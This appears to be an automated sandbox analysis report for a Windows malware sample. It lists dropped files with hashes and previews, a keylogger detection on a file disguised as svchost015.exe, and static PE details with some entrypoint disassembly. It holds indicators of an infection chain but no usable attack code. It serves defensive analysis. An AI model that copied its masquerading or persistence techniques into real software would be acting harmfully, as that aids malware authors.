File Type:	Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Mon Sep 2 06:21:50 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1070728
Entropy (8bit):	1.3775739331810397
Encrypted:	false
SSDEEP:	1536:HloDoDIrXasN705dHUtGxHfIByClro4H/+2ZQRYlH1rbTspWr9J+:FoDoIWsN70ItG1goCOa+2B5b5+
MD5:	DF0844916F1CA0A15E825F3FB3FAA965
SHA1:	6C88C0D7C80D2B655EF7494A89C4255E8CA5BE8C
SHA-256:	455E88DB2EE0D6E5DD74E02FFE734803C642FB290C3DD4B2F5A2917C9E31BB91
SHA-512:	AD40DD45D3DCCCEEEE32FF2C0A332E1A9414C4702BF6A86115486A2F034716AA385812F386E5C25B7B79A80759402EE25F2D8D54233E6675AA791F3AAC4F91E3
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......~Y.f................ .......Tj..@.......\|...........................x...........x.......8...........T...$........`.....................................X...............................................................................eJ......t.......Lw......................T............B.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9CD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	10814
Entropy (8bit):	3.704604181259309
Encrypted:	false
SSDEEP:	192:R6l7wVeJurDqULe6YwG3gmfqzVsHGeiprX/89bFFEjfn3m:R6lXJuk6Yx3gmfqzVsXF2jfW
MD5:	31FA2B1AB94DFCFF0CF5A8405D5788D8
SHA1:	3FDABBB3BFF1CDB5479EF93228F855E5573AB773
SHA-256:	0D5277A1B4D8C78DE9B8C9C60671A478C57005CCCDE4BD71DC6395F641753AA5
SHA-512:	6E60DEFA3365E2FF9A69103B6E9D3B4483AD453B7E2F5DD05EA804FECCC4F95AD2313C475DDA09E16AAD252FDE97E7F1CA55EE28DBCE58687009D7867FF961B7
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9FD.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4724
Entropy (8bit):	4.464088896132567
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaJg771I9LpSWpW8VY8VRYm8M4JYmFHyq85ckb9Q3jd:uIjfoI7Mpz7VxQJvGba3jd
MD5:	91D17E2EC51FFB087EDA6DD7BCF2EC94
SHA1:	097C61F8EDAE16426C0C3F5538C483C102BDAE22
SHA-256:	D7551B980DE8FE760467851AB0039EB381D075ED7D150DA6E6A78A7A014620D0
SHA-512:	F6DD1510FF17C090A13DC6BB218DBF91CDBE1C409D4684AD9B151AC8768AEC1272CF4B5ED97B6334C921CA642AD722B114ED9FF0BC8190AAA2DCEE4E6704478C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="482244" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107504
Entropy (8bit):	3.9985590843457017
Encrypted:	false
SSDEEP:	768:iY18tKkRGmgCMqjk0Yc/ImXk1gqNoLlFRjwHGpPhYDR1vINVW1/mOypZr3EPUhyX:ilKkPgi/ImXk2otUh2i4GGnFrFuyK1F8
MD5:	2BAAA36FDED2CDDF7F77656EC3E4A9BE
SHA1:	8F3E54A90F341888C89FB8CFF949D18C62C3E491
SHA-256:	38666CD6899B693CD963BEEE60EBC894DC2B357A8D5A552B6D1457DA9259ADD8
SHA-512:	40E6ECA371F60BB530036C438D069E973038C51FA7D00D9018A744FBC3DD0CDBB8518F13F1E48AF8E99B4FC11289D272100647F0C50BE993103B219DB6EF740C
Malicious:	false
Reputation:	low
Preview:	....h... ..............P...............X.......]...P..................V.......e.n.-.C.H.;.e.n.-.G.B...............p..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B.........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001e.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107504
Entropy (8bit):	3.9993515895865035
Encrypted:	false
SSDEEP:	768:zn18VKk6GmgCMqjk0Yc/ImXk1gqNoLlFRjwHGpPhYDR1vINVW1/mOypZr3EPUhyP:zeKkqgi/ImXk2otUh2i4GGnFrFuyK1I3
MD5:	BE391ADF418CA0D54A5B938209E81FC4
SHA1:	65B848557256816107D0DB78ED95A45734B8CE07
SHA-256:	58DD52E1D286E7D6B5442FBEEC92EAC76FD6D82E7DCC9645258B5366642090EA
SHA-512:	DD41D84BE2EBAA4A27C22F666FB296065BF221AB109207A964CA5EB9CE10B809B671831DDDD3F9C31E069804C6E01236D3357354AB94674AF7934E3493553A3D
Malicious:	false
Reputation:	low
Preview:	....h... ..............P...............X.......]...P..................V.......e.n.-.C.H.;.e.n.-.G.B...............p..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B.........................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\Windows[1].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	747
Entropy (8bit):	5.176066526559865
Encrypted:	false
SSDEEP:	12:YWgc2TwYH+0FaKFL/mXkH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB893c3Z:Yzc2TwYHFFRxekHt0drc6hE14
MD5:	F91814BC737381DA6CC1082F873A58E3
SHA1:	07DBC9CF2915850FB501DC094EEF2C93F17C831C
SHA-256:	65BE7779DACB4815CA0BA8891E5D2CAD4642497EF9B28285AF5BD975660777FD
SHA-512:	4A165108AC9A261DF257A17E395D227BCFE4ED05A7F78C9C3E485AC75B44883B53570B0281268BAB7488A6D54CA25BD1D31678FAFCC6E9C5A0F3D46A4CBA8E6B
Malicious:	false
Reputation:	low
Preview:	{"serviceContext":{"serviceActivityId":"66d55983-2f29-4189-aa48-61371e3c9f77","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"66d55983-2f29-4189-aa48-61371e3c9f77\|2024-09-02T06:21:55.6699565Z\|fabric_msn\|ESU\|News_491"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}

C:\Users\user\AppData\Local\Temp\9A25.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3639176
Entropy (8bit):	7.398157669285365
Encrypted:	false
SSDEEP:	98304:H+sv/t4BT7/Z/U6NVQFamv1oOgEoYYkTZ9:H+it4x7RcsmFxv+OgEoYvTZ9
MD5:	17D51083CCB2B20074B1DC2CAC5BEA36
SHA1:	0A046864AD4304F63DBDE5AC14D3DC05CFB48D46
SHA-256:	681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
SHA-512:	7DA8A2FD0321231C17FDDF414BF1D5A03D71DBC619F68958FF1D167003F972920F0F3C830B8A25AA715DF4FCC044D88D739B6EAB115A5B0B0A53852A70F4238A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:	Filename: mLn7GEEpuS.exe, Detection: malicious, Browse Filename: V6n3oygctH.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................H....2......V.......`....@...........................7.......7..........@............................... ...P...v1..........f7..!......Dd..................................................................................CODE....`F.......H.................. ..`DATA....d....`.......L..............@...BSS.....Q............f...................idata... ......."...f..............@....tls.....................................rdata..............................@..P.reloc..Dd.......f..................@..P.rsrc....v1..P...v1.................@..P..............7......f7.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\svchost015.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\9A25.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990472
Entropy (8bit):	6.459856200541649
Encrypted:	false
SSDEEP:	49152:/INqIwJA7BYAzLOhHpB63X4oQaM35DhnSYf7bPZcYsO5+th1:wNqC7BZEHSQz5DhnSy7ujL
MD5:	B826DD92D78EA2526E465A34324EBEEA
SHA1:	BF8A0093ACFD2EB93C102E1A5745FB080575372E
SHA-256:	7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
SHA-512:	1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: mLn7GEEpuS.exe, Detection: malicious, Browse Filename: V6n3oygctH.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse Filename: h8jGj6Qe78.exe, Detection: malicious, Browse Filename: ACGPhnMVxb.exe, Detection: malicious, Browse Filename: 2eqt27LXwV.exe, Detection: malicious, Browse Filename: uxx8jvvSHl.exe, Detection: malicious, Browse Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse Filename: JZ9FCJzkXL.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....\|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\birajci

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	413184
Entropy (8bit):	5.970134337921282
Encrypted:	false
SSDEEP:	6144:k2Lh2Mw6FnhZ+ObiTteTqeN1qRU1WG0S2IcNPk:kSh2JYnhoObK4MUCXi
MD5:	A4BC249DC997DF25A0E709EEE0A0DF87
SHA1:	D4BD3DCC3C5C1BED477F3ECCBF1561B4C4F9180B
SHA-256:	F691D08D4D08A092F52D63EB5A5FCE0CBDEEAA042C18282C73AC5EBB627C25D3
SHA-512:	E4C12400284EA1B11C13B85C19AAF41569C40BE1519ADBB2D388AE1DDBB06CAA7BA08898F42CE0DE19640769418267908C1282C734164B3714B40541C18CCE36
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.:.=.i.=.i.=.i.Kki.=.i.K_i.=.i.K^i.=.i.Efi.=.i.=.i.=.i.KZi.=.i.Koi.=.i.Khi.=.iRich.=.i........PE..L......e............................2L............@..........................p.......Y..........................................P....@..."..........................l................................4..@............................................text.............................. ..`.data....s.......x..................@....rsrc...."...@...$...*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\birajci:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.970134337921282
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	oZB7n3wuNk.exe
File size:	413'184 bytes
MD5:	a4bc249dc997df25a0e709eee0a0df87
SHA1:	d4bd3dcc3c5c1bed477f3eccbf1561b4c4f9180b
SHA256:	f691d08d4d08a092f52d63eb5a5fce0cbdeeaa042c18282c73ac5ebb627c25d3
SHA512:	e4c12400284ea1b11c13b85c19aaf41569c40be1519adbb2d388ae1ddbb06caa7ba08898f42ce0de19640769418267908c1282c734164b3714b40541c18cce36
SSDEEP:	6144:k2Lh2Mw6FnhZ+ObiTteTqeN1qRU1WG0S2IcNPk:kSh2JYnhoObK4MUCXi
TLSH:	C094CF126AE8BC25D5612A329D2DC7FC362EBC11AE14375A22D87F3F28703E1F562351
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.:.=.i.=.i.=.i.Kki.=.i.K_i.=.i.K^i.=.i.Efi.=.i.=.i.=.i.KZi.=.i.Koi.=.i.Khi.=.iRich.=.i........PE..L......e...................

File Icon


Icon Hash:	cd4d3d2e4e054d07

Static PE Info

General

Entrypoint:	0x404c32
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65BDF7BA [Sat Feb 3 08:22:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3db609d4227cf2765fb47eb54c2d687e

Entrypoint Preview

Instruction
call 00007F73C917840Ah
jmp 00007F73C91757FEh
push 00000008h
push 0043B090h
call 00007F73C9177AADh
mov ecx, dword ptr [ebp+08h]
test ecx, ecx
je 00007F73C917599Ch
cmp dword ptr [ecx], E06D7363h
jne 00007F73C9175994h
mov eax, dword ptr [ecx+1Ch]
test eax, eax
je 00007F73C917598Dh
mov eax, dword ptr [eax+04h]
test eax, eax
je 00007F73C9175986h
and dword ptr [ebp-04h], 00000000h
push eax
push dword ptr [ecx+18h]
call 00007F73C917854Fh
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F73C9177ABCh
ret
xor eax, eax
cmp byte ptr [ebp+0Ch], al
setne al
ret
mov esp, dword ptr [ebp-18h]
call 00007F73C91774F8h
int3
call 00007F73C917654Eh
xor ecx, ecx
cmp dword ptr [eax+00000090h], ecx
setne al
ret
sub eax, 000003A4h
je 00007F73C9175994h
sub eax, 04h
je 00007F73C9175989h
sub eax, 0Dh
je 00007F73C917597Eh
dec eax
je 00007F73C9175975h
xor eax, eax
ret
mov eax, 00000404h
ret
mov eax, 00000412h
ret
mov eax, 00000804h
ret
mov eax, 00000411h
ret
mov edi, edi
push esi
push edi
mov esi, eax
push 00000101h
xor edi, edi
lea eax, dword ptr [esi+1Ch]
push edi
push eax
call 00007F73C917886Dh
xor eax, eax
movzx ecx, ax
mov eax, ecx
mov dword ptr [esi+04h], edi
mov dword ptr [esi+08h], edi
mov dword ptr [esi+0Ch], edi
shl ecx, 00000000h

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b21c	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e4000	0x122d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b26c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3408	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1cc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3acca	0x3ae00	c21eb577dabdfebaf1f9a319e36eb71f	False	0.8554977773354565	data	7.6644446499082015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x3c000	0x1a7304	0x17800	bb0ec0b3d9013f7f2267865380e6ca23	False	0.01915724734042553	data	0.2516136039511897	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1e4000	0x122d0	0x12400	7ded111e84f1fd561b878d0e5d6a9631	False	0.3543851669520548	data	4.528155850993527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x1f0f48	0xe	data			1.5714285714285714
AFX_DIALOG_LAYOUT	0x1f0f58	0x2	data			5.0
RT_CURSOR	0x1f0f60	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x1f1290	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_CURSOR	0x1f13e8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x1f2290	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x1f2b38	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_CURSOR	0x1f30d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x1f3f78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x1f4820	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_ICON	0x1e4830	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.46375266524520253
RT_ICON	0x1e4830	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.46375266524520253
RT_ICON	0x1e56d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5749097472924187
RT_ICON	0x1e56d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5749097472924187
RT_ICON	0x1e5f80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.636520737327189
RT_ICON	0x1e5f80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.636520737327189
RT_ICON	0x1e6648	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6921965317919075
RT_ICON	0x1e6648	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6921965317919075
RT_ICON	0x1e6bb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.3573651452282158
RT_ICON	0x1e6bb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.3573651452282158
RT_ICON	0x1e9158	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	India	0.4455909943714822
RT_ICON	0x1e9158	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	Sri Lanka	0.4455909943714822
RT_ICON	0x1ea200	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	India	0.5176229508196721
RT_ICON	0x1ea200	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	Sri Lanka	0.5176229508196721
RT_ICON	0x1eab88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.6152482269503546
RT_ICON	0x1eab88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.6152482269503546
RT_ICON	0x1eb068	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3675373134328358
RT_ICON	0x1eb068	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3675373134328358
RT_ICON	0x1ebf10	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.453971119133574
RT_ICON	0x1ebf10	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.453971119133574
RT_ICON	0x1ec7b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.45794930875576034
RT_ICON	0x1ec7b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.45794930875576034
RT_ICON	0x1ece80	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.4552023121387283
RT_ICON	0x1ece80	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.4552023121387283
RT_ICON	0x1ed3e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.26815352697095435
RT_ICON	0x1ed3e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.26815352697095435
RT_ICON	0x1ef990	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.31097560975609756
RT_ICON	0x1ef990	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.31097560975609756
RT_ICON	0x1f0a38	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.3528368794326241
RT_ICON	0x1f0a38	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.3528368794326241
RT_DIALOG	0x1f5028	0x58	data			0.8977272727272727
RT_STRING	0x1f5080	0x3b8	AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"	Tamil	India	0.4653361344537815
RT_STRING	0x1f5080	0x3b8	AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"	Tamil	Sri Lanka	0.4653361344537815
RT_STRING	0x1f5438	0x536	data	Tamil	India	0.444527736131934
RT_STRING	0x1f5438	0x536	data	Tamil	Sri Lanka	0.444527736131934
RT_STRING	0x1f5970	0x1f4	data	Tamil	India	0.518
RT_STRING	0x1f5970	0x1f4	data	Tamil	Sri Lanka	0.518
RT_STRING	0x1f5b68	0x508	data	Tamil	India	0.4409937888198758
RT_STRING	0x1f5b68	0x508	data	Tamil	Sri Lanka	0.4409937888198758
RT_STRING	0x1f6070	0x260	data	Tamil	India	0.4934210526315789
RT_STRING	0x1f6070	0x260	data	Tamil	Sri Lanka	0.4934210526315789
RT_ACCELERATOR	0x1f0f08	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x1f0f08	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x1f13c0	0x22	data			1.0294117647058822
RT_GROUP_CURSOR	0x1f30a0	0x30	data			0.9375
RT_GROUP_CURSOR	0x1f4d88	0x30	data			0.9375
RT_GROUP_ICON	0x1eaff0	0x76	data	Tamil	India	0.6610169491525424
RT_GROUP_ICON	0x1eaff0	0x76	data	Tamil	Sri Lanka	0.6610169491525424
RT_GROUP_ICON	0x1f0ea0	0x68	data	Tamil	India	0.7115384615384616
RT_GROUP_ICON	0x1f0ea0	0x68	data	Tamil	Sri Lanka	0.7115384615384616
RT_VERSION	0x1f4db8	0x26c	data			0.5451612903225806

Imports

DLL	Import
